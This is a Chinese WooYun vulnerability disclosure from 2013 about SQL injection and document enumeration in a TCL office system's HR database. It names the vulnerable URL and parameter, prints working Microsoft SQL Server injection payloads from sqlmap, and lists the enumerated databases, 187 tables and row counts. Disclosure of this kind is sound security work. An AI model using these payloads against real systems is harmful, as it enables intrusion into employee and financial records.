当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045719

漏洞标题:TCL#某重要办公系统存在漏洞导致SQL注射及信息泄露

相关厂商:TCL官方网上商城

漏洞作者: Mr.leo

提交时间:2013-12-12 15:48

修复时间:2014-01-26 15:49

公开时间:2014-01-26 15:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-12: 细节已通知厂商并且等待厂商处理中
2013-12-17: 厂商已经确认,细节仅向厂商公开
2013-12-27: 细节向核心白帽子及相关领域专家公开
2014-01-06: 细节向普通白帽子公开
2014-01-16: 细节向实习白帽子公开
2014-01-26: 细节向公众公开

简要描述:

TCL#某重要办公系统存在漏洞导致SQL注射及信息泄露

详细说明:

站点:
http://oa.tclking.com TCL网络办公系统
由于网站没有设置robots.txt,导致被搜索引擎抓取

123.png


访问红框链接,导致TCL内部信息泄露
http://oa.tclking.com/companycase/CompanyGonggPrint.aspx?documno=S2012084700
ID号可以遍历,S2012XXXXXX 查询任意信息

456.png


789.png


最严重的问题在于该链接存在SQL注射漏洞
穿山甲

123123.png


sqlmap跑起
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: documno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: documno=S2012084705' AND 2378=2378 AND 'fiFx'='fiFx
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: documno=S2012084705' AND 6278=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(112)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6278=6278) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(121)+CHAR(115)+CHAR(118)+CHAR(58))) AND 'AIEz'='AIEz
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: documno=S2012084705'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: documno=S2012084705' WAITFOR DELAY '0:0:5'--
---
current user: 'GICHrmDB'
current database: 'Hrm'
available databases [12]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: Hrm
[187 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree |
| dbo.DevCmds |
| dbo.Devinfo |
| dbo.DinSysAccount |
| dbo.FAPAYMODEL |
| dbo.FAPINGZHENMODEL |
| dbo.FASUBJECT |
| dbo.FaceTmp |
| dbo.Finance_MainIndex |
| dbo.G4_worktimetable |
| dbo.HR_ConBase |
| dbo.HR_DeptToWorkNo |
| dbo.HR_UserGroup |
| dbo.HR_condition |
| dbo.Hr_OutDept |
| dbo.Hr_Position |
| dbo.Hr_Position_Bak |
| dbo.Hr_SelectTemp |
| dbo.Hrm_Freeze |
| dbo.Kq_AllWorkHour |
| dbo.OACITY |
| dbo.OAPROMARY |
| dbo.OASUPPLIERNO |
| dbo.OA_Account |
| dbo.OA_AccountRight |
| dbo.OA_BC_BudgetCost |
| dbo.OA_BC_FreebackMSG |
| dbo.OA_BC_VariableCost |
| dbo.OA_BC_userright |
| dbo.OA_Car_Booking |
| dbo.OA_Car_Driver |
| dbo.OA_Car_Info |
| dbo.OA_CartNO |
| dbo.OA_CompanyTemp |
| dbo.OA_Controlsub |
| dbo.OA_DocuMentList |
| dbo.OA_EmailRemind |
| dbo.OA_EmailRemindtest |
| dbo.OA_Exam_DB |
| dbo.OA_Exam_ExamMain |
| dbo.OA_Exam_Options |
| dbo.OA_FB_Mainmast |
| dbo.OA_FinanceList |
| dbo.OA_FinancePayMent |
| dbo.OA_GICFinancial |
| dbo.OA_Hr_CommunicationBase |
| dbo.OA_Hr_DictDB |
| dbo.OA_Hr_EducationBase |
| dbo.OA_Hr_EmployeeBase |
| dbo.OA_Hr_EmployeeBaseSed |
| dbo.OA_Hr_FamilyBase |
| dbo.OA_Hr_LaborContract |
| dbo.OA_Hr_LanguageBase |
| dbo.OA_Hr_NationalTitles |
| dbo.OA_Hr_WorkExperience |
| dbo.OA_MES_Board |
| dbo.OA_MainDocuMent |
| dbo.OA_MeetingQuitment |
| dbo.OA_MeetingRoom |
| dbo.OA_Meetingarea |
| dbo.OA_MessTrans |
| dbo.OA_MsgTemp |
| dbo.OA_NextDeptCode |
| dbo.OA_Post |
| dbo.OA_PostAccount |
| dbo.OA_ReplacecardRecord |
| dbo.OA_Role |
| dbo.OA_SMS |
| dbo.OA_UserRole |
| dbo.OA_WarehouseAuthorized |
| dbo.OA_base |
| dbo.OA_companydetail |
| dbo.OA_companymast |
| dbo.OA_companymast_bak |
| dbo.OA_deptleadership |
| dbo.OA_fiveSgr |
| dbo.OA_fiveSmsg |
| dbo.OMS_DocMain |
| dbo.OMS_MeetTable |
| dbo.OMS_Members |
| dbo.Oa_BC_Actualcost |
| dbo.Oa_BC_BUSapcodeTable |
| dbo.Oa_BC_BusinessCodeTable |
| dbo.Oa_BC_ChangeCode |
| dbo.Oa_BC_CodeTable |
| dbo.Oa_BC_Costrate |
| dbo.Oa_BC_FXrate |
| dbo.Oa_BC_SapcodeTable |
| dbo.Oa_BC_SubTable |
| dbo.Oa_Dictionary |
| dbo.Oa_Position |
| dbo.Oa_RightMast |
| dbo.Oa_dept |
| dbo.Oms_FileList |
| dbo.Oms_ItemDetail |
| dbo.Oms_ItemLog |
| dbo.Oms_ItemMenPer |
| dbo.Oms_ModelDetail |
| dbo.Oms_ModelMain |
| dbo.ProjectBase |
| dbo.ProjectItem |
| dbo.ProjectLog |
| dbo.SyncTemp |
| dbo.Sys_PrgMast |
| dbo.System_Menu |
| dbo.System_PrgMast |
| dbo.System_Update |
| dbo.System_UserMast |
| dbo.Table_1 |
| dbo.Tmp_10 |
| dbo.Tmp_9 |
| dbo.Tmp_90 |
| dbo.UserInfo |
| dbo.WF_Delegate |
| dbo.WF_ModelDetail |
| dbo.WF_ModelMast |
| dbo.[��ѯ] |
| dbo.att_record |
| dbo.budget_upload_excel |
| dbo.deptMesTOHrm |
| dbo.dtproperties |
| dbo.fix_category |
| dbo.fix_dictdb |
| dbo.fix_fixedmast |
| dbo.fix_mark |
| dbo.fix_mess |
| dbo.fix_news |
| dbo.fix_orders |
| dbo.fix_sorts |
| dbo.hr_AddrSFZ |
| dbo.hr_RzEmailInfo |
| dbo.hr_base |
| dbo.hr_class |
| dbo.hr_department |
| dbo.hr_dept |
| dbo.hr_deptcopy |
| dbo.hr_emp_titles |
| dbo.hr_employee |
| dbo.hr_employeeBF |
| dbo.hr_employeeForSAP319 |
| dbo.hr_employee_lz |
| dbo.hr_employee_rz |
| dbo.hr_employee_tp |
| dbo.hr_employee_tpback |
| dbo.kq_DoorRecord |
| dbo.kq_LZDate |
| dbo.kq_Machines |
| dbo.kq_SpeOverTimeR |
| dbo.kq_SpeWorkRecord |
| dbo.kq_auto_Machines |
| dbo.kq_base |
| dbo.kq_cardlist |
| dbo.kq_finger |
| dbo.kq_holiday |
| dbo.kq_leave |
| dbo.kq_leaveDay |
| dbo.kq_leave_bak |
| dbo.kq_leave_main |
| dbo.kq_leavemonth |
| dbo.kq_machines_emp |
| dbo.kq_machines_log |
| dbo.kq_monthgs |
| dbo.kq_overtime |
| dbo.kq_overtime_bak |
| dbo.kq_transpose |
| dbo.kq_transpose_bak |
| dbo.kq_workday |
| dbo.kq_workday_bak |
| dbo.kq_workday_checkUp |
| dbo.kq_workmonth |
| dbo.kq_workmonth_lz |
| dbo.kq_workrecord |
| dbo.kq_workrecord_bak |
| dbo.kq_worktimetable |
| dbo.oa_TotalMoney |
| dbo.oa_TotalMoneySAP |
| dbo.oa_TotalMoney_Test |
| dbo.oa_accountbak |
| dbo.oa_totalmoney_Copy |
| dbo.oa_totalmoney_bak |
| dbo.sys_user |
| dbo.sys_userright |
| dbo.sysdiagrams |
| dbo.system_Per |
| dbo.tb_Temp |
| dbo.temptable |
+------------------------------+
截取一部分
Database: Hrm
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.kq_workrecord_bak | 22712493 |
| dbo.kq_workday_bak | 11426503 |
| dbo.kq_workrecord | 6574826 |
| dbo.kq_transpose_bak | 6475205 |
| dbo.kq_overtime_bak | 4174567 |
| dbo.kq_transpose | 2766671 |
| dbo.OA_companydetail | 1244995 |

77887788.png


漏洞证明:

Database: Hrm
[187 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree |
| dbo.DevCmds |
| dbo.Devinfo |
| dbo.DinSysAccount |
| dbo.FAPAYMODEL |
| dbo.FAPINGZHENMODEL |
| dbo.FASUBJECT |
| dbo.FaceTmp |
| dbo.Finance_MainIndex |
| dbo.G4_worktimetable |
| dbo.HR_ConBase |
| dbo.HR_DeptToWorkNo |
| dbo.HR_UserGroup |
| dbo.HR_condition |
| dbo.Hr_OutDept |
| dbo.Hr_Position |
| dbo.Hr_Position_Bak |
| dbo.Hr_SelectTemp |
| dbo.Hrm_Freeze |
| dbo.Kq_AllWorkHour |
| dbo.OACITY |
| dbo.OAPROMARY |
| dbo.OASUPPLIERNO |
| dbo.OA_Account |
| dbo.OA_AccountRight |
| dbo.OA_BC_BudgetCost |
| dbo.OA_BC_FreebackMSG |
| dbo.OA_BC_VariableCost |
| dbo.OA_BC_userright |
| dbo.OA_Car_Booking |
| dbo.OA_Car_Driver |
| dbo.OA_Car_Info |
| dbo.OA_CartNO |
| dbo.OA_CompanyTemp |
| dbo.OA_Controlsub |
| dbo.OA_DocuMentList |
| dbo.OA_EmailRemind |
| dbo.OA_EmailRemindtest |
| dbo.OA_Exam_DB |
| dbo.OA_Exam_ExamMain |
| dbo.OA_Exam_Options |
| dbo.OA_FB_Mainmast |
| dbo.OA_FinanceList |
| dbo.OA_FinancePayMent |
| dbo.OA_GICFinancial |
| dbo.OA_Hr_CommunicationBase |
| dbo.OA_Hr_DictDB |
| dbo.OA_Hr_EducationBase |
| dbo.OA_Hr_EmployeeBase |
| dbo.OA_Hr_EmployeeBaseSed |
| dbo.OA_Hr_FamilyBase |
| dbo.OA_Hr_LaborContract |
| dbo.OA_Hr_LanguageBase |
| dbo.OA_Hr_NationalTitles |
| dbo.OA_Hr_WorkExperience |
| dbo.OA_MES_Board |
| dbo.OA_MainDocuMent |
| dbo.OA_MeetingQuitment |
| dbo.OA_MeetingRoom |
| dbo.OA_Meetingarea |
| dbo.OA_MessTrans |
| dbo.OA_MsgTemp |
| dbo.OA_NextDeptCode |
| dbo.OA_Post |
| dbo.OA_PostAccount |
| dbo.OA_ReplacecardRecord |
| dbo.OA_Role |
| dbo.OA_SMS |
| dbo.OA_UserRole |
| dbo.OA_WarehouseAuthorized |
| dbo.OA_base |
| dbo.OA_companydetail |
| dbo.OA_companymast |
| dbo.OA_companymast_bak |
| dbo.OA_deptleadership |
| dbo.OA_fiveSgr |
| dbo.OA_fiveSmsg |
| dbo.OMS_DocMain |
| dbo.OMS_MeetTable |
| dbo.OMS_Members |
| dbo.Oa_BC_Actualcost |
| dbo.Oa_BC_BUSapcodeTable |
| dbo.Oa_BC_BusinessCodeTable |
| dbo.Oa_BC_ChangeCode |
| dbo.Oa_BC_CodeTable |
| dbo.Oa_BC_Costrate |
| dbo.Oa_BC_FXrate |
| dbo.Oa_BC_SapcodeTable |
| dbo.Oa_BC_SubTable |
| dbo.Oa_Dictionary |
| dbo.Oa_Position |
| dbo.Oa_RightMast |
| dbo.Oa_dept |
| dbo.Oms_FileList |
| dbo.Oms_ItemDetail |
| dbo.Oms_ItemLog |
| dbo.Oms_ItemMenPer |
| dbo.Oms_ModelDetail |
| dbo.Oms_ModelMain |
| dbo.ProjectBase |
| dbo.ProjectItem |
| dbo.ProjectLog |
| dbo.SyncTemp |
| dbo.Sys_PrgMast |
| dbo.System_Menu |
| dbo.System_PrgMast |
| dbo.System_Update |
| dbo.System_UserMast |
| dbo.Table_1 |
| dbo.Tmp_10 |
| dbo.Tmp_9 |
| dbo.Tmp_90 |
| dbo.UserInfo |
| dbo.WF_Delegate |
| dbo.WF_ModelDetail |
| dbo.WF_ModelMast |
| dbo.[��ѯ] |
| dbo.att_record |
| dbo.budget_upload_excel |
| dbo.deptMesTOHrm |
| dbo.dtproperties |
| dbo.fix_category |
| dbo.fix_dictdb |
| dbo.fix_fixedmast |
| dbo.fix_mark |
| dbo.fix_mess |
| dbo.fix_news |
| dbo.fix_orders |
| dbo.fix_sorts |
| dbo.hr_AddrSFZ |
| dbo.hr_RzEmailInfo |
| dbo.hr_base |
| dbo.hr_class |
| dbo.hr_department |
| dbo.hr_dept |
| dbo.hr_deptcopy |
| dbo.hr_emp_titles |
| dbo.hr_employee |
| dbo.hr_employeeBF |
| dbo.hr_employeeForSAP319 |
| dbo.hr_employee_lz |
| dbo.hr_employee_rz |
| dbo.hr_employee_tp |
| dbo.hr_employee_tpback |
| dbo.kq_DoorRecord |
| dbo.kq_LZDate |
| dbo.kq_Machines |
| dbo.kq_SpeOverTimeR |
| dbo.kq_SpeWorkRecord |
| dbo.kq_auto_Machines |
| dbo.kq_base |
| dbo.kq_cardlist |
| dbo.kq_finger |
| dbo.kq_holiday |
| dbo.kq_leave |
| dbo.kq_leaveDay |
| dbo.kq_leave_bak |
| dbo.kq_leave_main |
| dbo.kq_leavemonth |
| dbo.kq_machines_emp |
| dbo.kq_machines_log |
| dbo.kq_monthgs |
| dbo.kq_overtime |
| dbo.kq_overtime_bak |
| dbo.kq_transpose |
| dbo.kq_transpose_bak |
| dbo.kq_workday |
| dbo.kq_workday_bak |
| dbo.kq_workday_checkUp |
| dbo.kq_workmonth |
| dbo.kq_workmonth_lz |
| dbo.kq_workrecord |
| dbo.kq_workrecord_bak |
| dbo.kq_worktimetable |
| dbo.oa_TotalMoney |
| dbo.oa_TotalMoneySAP |
| dbo.oa_TotalMoney_Test |
| dbo.oa_accountbak |
| dbo.oa_totalmoney_Copy |
| dbo.oa_totalmoney_bak |
| dbo.sys_user |
| dbo.sys_userright |
| dbo.sysdiagrams |
| dbo.system_Per |
| dbo.tb_Temp |
| dbo.temptable |
+------------------------------+

修复方案:

1#添加robots.txt
2#修复SQL注入漏洞
3#高RANK

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-17 14:52

厂商回复:

已转交相关单位确认处理,谢谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-16 14:06 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @TCL官方网上商城 忽略的节奏??